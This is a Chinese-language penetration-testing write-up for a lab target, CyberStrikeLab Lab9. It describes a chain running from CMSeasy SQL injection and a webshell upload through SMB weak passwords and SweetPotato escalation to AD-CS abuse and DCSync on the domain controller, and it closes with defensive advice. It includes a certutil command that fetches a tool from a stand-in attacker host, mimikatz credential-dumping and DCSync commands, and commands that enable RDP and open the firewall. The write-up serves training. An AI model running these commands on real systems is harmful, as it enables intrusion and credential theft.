cyberstrikelab-Lab9靶机 WP
字数 2110 2025-08-29 22:41:24

CyberStrikeLab-Lab9 靶机渗透测试教学文档

1. 靶机基本信息与攻击路径概述

  • 主要攻击路径
    • 通过 CMSeasy SQL 注入获取后台管理员凭证
    • 利用 CMSeasy 7.7.5 后台任意文件上传漏洞获取 WebShell
    • 内网渗透发现 SMB 弱口令
    • 提权至 SYSTEM 账户获取机器 Hash
    • 利用 AD-CS (Active Directory 证书服务)漏洞横向移动
    • 最终通过 DCSync 获取域控权限

2. Flag01 获取过程

2.1 信息收集

  • 对目标进行常规端口扫描和服务识别
  • 发现 CMSeasy CMS 系统

2.2 CMSeasy SQL 注入获取管理员凭证

  1. 发现注入点

    • 通过测试发现 CMSeasy 存在 SQL 注入漏洞

  2. 利用注入获取管理员凭证

    • 通过 SQL 注入获取管理员用户名和密码哈希
    • 获取的凭证:admin:admin123456
    • 使用 MD5 解密工具破解密码哈希

2.3 CMSeasy 7.7.5 后台任意文件上传

  1. 登录后台

    • 使用获取的凭证 admin:admin123456 登录 CMS 后台

  2. 获取有效 Cookie

    • 记录登录后的会话 Cookie

  3. 利用文件上传漏洞

    • 通过构造特定请求实现任意文件上传
    • 上传 PHP WebShell 文件

2.4 获取 WebShell

  1. 连接 WebShell

    • 使用蚁剑等工具连接上传的 WebShell
    • 确认 WebShell 功能正常

  2. 初步权限确认

    • 通过 WebShell 确认当前用户权限
    • 发现系统存在双网卡,连接内网 10.0.0.0/24 网段

3. Flag02 获取过程

3.1 内网代理搭建

  1. 选择代理工具

    • 使用 stowaway 搭建内网代理

  2. 工具上传问题

    • 注意:蚁剑上传大文件可能不完整
    • 解决方案:使用 certutil 命令下载 stowaway 客户端
    • 示例命令: 
      certutil -urlcache -split -f http://attacker.com/stowaway.exe stowaway.exe

3.2 内网扫描

  1. 扫描工具选择

    • 推荐将 fscan 等扫描工具直接上传到目标机器
    • 避免通过代理扫描导致速度过慢

  2. 扫描执行

    • 通过 stowaway 代理开启 shell 执行 fscan
    • 扫描结果分析:
      • 发现 SMB 服务存在弱口令
      • 识别域环境及相关服务

3.3 SMB 弱口令利用

  1. 检测确认

    • 验证 SMB 弱口令有效性
    • 确认是本地管理员账户

  2. 连接方法

    • 使用 SMBEXEC 或 WMI 连接
    • 示例命令: 
      python smbexec.py user:password@10.0.0.x

  3. 权限确认

    • 检查当前权限
    • 发现 SeImpersonatePrivilege 特权存在

3.4 RDP 连接配置

  1. 启用 RDP

    • 作为管理员启用 3389 端口
    • 命令: 
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  2. 防火墙配置

    • 添加防火墙规则允许 RDP
    • 命令: 
      netsh advfirewall firewall add rule name="Open RDP" dir=in action=allow protocol=TCP localport=3389

3.5 提权至 SYSTEM 并获取机器 Hash

  1. 提权工具选择

    • 使用 SweetPotato 进行提权
    • 上传 SweetPotato 和 mimikatz 到目标

  2. 提权执行

    • 通过 SweetPotato 从管理员提升至 SYSTEM
    • 命令示例: 
      SweetPotato.exe -c "whoami"

  3. 获取机器 Hash

    • 使用 mimikatz 获取机器账户 Hash
    • 命令: 
      mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    • 获取到机器用户 CYBERWEB$ 的 Hash

4. Flag03 获取过程

4.1 AD-CS (Active Directory 证书服务)攻击

  1. 获取 CA 名称

    • 需要 SYSTEM 权限与域通信
    • 命令: 
      certutil -config - -ping
    • 获取 CA 名称:cyberstrikelab-DC-CA

  2. 配置 hosts 文件

    • 添加域控解析记录
    • 命令: 
      echo 10.0.0.x cyberstrikelab-DC >> C:\Windows\System32\drivers\etc\hosts

  3. 利用机器用户 Hash 攻击

    • 使用 CYBERWEB$ 机器用户 Hash 创建新机器用户
    • 为新机器用户申请证书
    • 利用证书获取域控机器账号 Hash

4.2 DCSync 攻击

  1. 执行 DCSync

    • 使用域控机器 Hash 执行 DCSync
    • 获取域内所有用户 Hash

  2. 命令示例

    mimikatz.exe "lsadump::dcsync /domain:cyberstrikelab /user:krbtgt" exit

4.3 Pass-the-Hash (PTH) 攻击

  1. 横向移动

    • 使用获取的域控 Hash 进行 PTH
    • 获取域控完全控制权限

  2. 获取 Flag03

    • 在域控上定位并读取 flag03 文件

5. 关键工具与命令总结

工具/命令 用途
certutil 文件下载、CA 信息查询
stowaway 内网代理搭建
fscan 内网扫描
SweetPotato Windows 提权
mimikatz 凭证提取、DCSync
smbexec/WMI SMB 弱口令利用
RDP 图形化界面操作

6. 防御建议

  1. 针对 CMSeasy

    • 及时更新 CMS 到最新版本
    • 限制后台文件上传类型

  2. 针对 SMB

    • 禁用 SMBv1
    • 设置强密码策略
    • 限制 SMB 访问来源

  3. 针对 AD-CS

    • 启用证书服务审计
    • 限制证书模板权限
    • 监控异常证书请求

  4. 通用防御

    • 启用 Windows 事件日志
    • 部署 EDR 解决方案
    • 定期进行渗透测试
CyberStrikeLab-Lab9 靶机渗透测试教学文档 1. 靶机基本信息与攻击路径概述 主要攻击路径 : 通过 CMSeasy SQL 注入获取后台管理员凭证 利用 CMSeasy 7.7.5 后台任意文件上传漏洞获取 WebShell 内网渗透发现 SMB 弱口令 提权至 SYSTEM 账户获取机器 Hash 利用 AD-CS (Active Directory 证书服务)漏洞横向移动 最终通过 DCSync 获取域控权限 2. Flag01 获取过程 2.1 信息收集 对目标进行常规端口扫描和服务识别 发现 CMSeasy CMS 系统 2.2 CMSeasy SQL 注入获取管理员凭证 发现注入点 : 通过测试发现 CMSeasy 存在 SQL 注入漏洞 利用注入获取管理员凭证 : 通过 SQL 注入获取管理员用户名和密码哈希 获取的凭证: admin:admin123456 使用 MD5 解密工具破解密码哈希 2.3 CMSeasy 7.7.5 后台任意文件上传 登录后台 : 使用获取的凭证 admin:admin123456 登录 CMS 后台 获取有效 Cookie : 记录登录后的会话 Cookie 利用文件上传漏洞 : 通过构造特定请求实现任意文件上传 上传 PHP WebShell 文件 2.4 获取 WebShell 连接 WebShell : 使用蚁剑等工具连接上传的 WebShell 确认 WebShell 功能正常 初步权限确认 : 通过 WebShell 确认当前用户权限 发现系统存在双网卡,连接内网 10.0.0.0/24 网段 3. Flag02 获取过程 3.1 内网代理搭建 选择代理工具 : 使用 stowaway 搭建内网代理 工具上传问题 : 注意:蚁剑上传大文件可能不完整 解决方案:使用 certutil 命令下载 stowaway 客户端 示例命令: 3.2 内网扫描 扫描工具选择 : 推荐将 fscan 等扫描工具直接上传到目标机器 避免通过代理扫描导致速度过慢 扫描执行 : 通过 stowaway 代理开启 shell 执行 fscan 扫描结果分析: 发现 SMB 服务存在弱口令 识别域环境及相关服务 3.3 SMB 弱口令利用 检测确认 : 验证 SMB 弱口令有效性 确认是本地管理员账户 连接方法 : 使用 SMBEXEC 或 WMI 连接 示例命令: 权限确认 : 检查当前权限 发现 SeImpersonatePrivilege 特权存在 3.4 RDP 连接配置 启用 RDP : 作为管理员启用 3389 端口 命令: 防火墙配置 : 添加防火墙规则允许 RDP 命令: 3.5 提权至 SYSTEM 并获取机器 Hash 提权工具选择 : 使用 SweetPotato 进行提权 上传 SweetPotato 和 mimikatz 到目标 提权执行 : 通过 SweetPotato 从管理员提升至 SYSTEM 命令示例: 获取机器 Hash : 使用 mimikatz 获取机器账户 Hash 命令: 获取到机器用户 CYBERWEB$ 的 Hash 4. Flag03 获取过程 4.1 AD-CS (Active Directory 证书服务)攻击 获取 CA 名称 : 需要 SYSTEM 权限与域通信 命令: 获取 CA 名称: cyberstrikelab-DC-CA 配置 hosts 文件 : 添加域控解析记录 命令: 利用机器用户 Hash 攻击 : 使用 CYBERWEB$ 机器用户 Hash 创建新机器用户 为新机器用户申请证书 利用证书获取域控机器账号 Hash 4.2 DCSync 攻击 执行 DCSync : 使用域控机器 Hash 执行 DCSync 获取域内所有用户 Hash 命令示例 : 4.3 Pass-the-Hash (PTH) 攻击 横向移动 : 使用获取的域控 Hash 进行 PTH 获取域控完全控制权限 获取 Flag03 : 在域控上定位并读取 flag03 文件 5. 关键工具与命令总结 | 工具/命令 | 用途 | |-----------|------| | certutil | 文件下载、CA 信息查询 | | stowaway | 内网代理搭建 | | fscan | 内网扫描 | | SweetPotato | Windows 提权 | | mimikatz | 凭证提取、DCSync | | smbexec/WMI | SMB 弱口令利用 | | RDP | 图形化界面操作 | 6. 防御建议 针对 CMSeasy : 及时更新 CMS 到最新版本 限制后台文件上传类型 针对 SMB : 禁用 SMBv1 设置强密码策略 限制 SMB 访问来源 针对 AD-CS : 启用证书服务审计 限制证书模板权限 监控异常证书请求 通用防御 : 启用 Windows 事件日志 部署 EDR 解决方案 定期进行渗透测试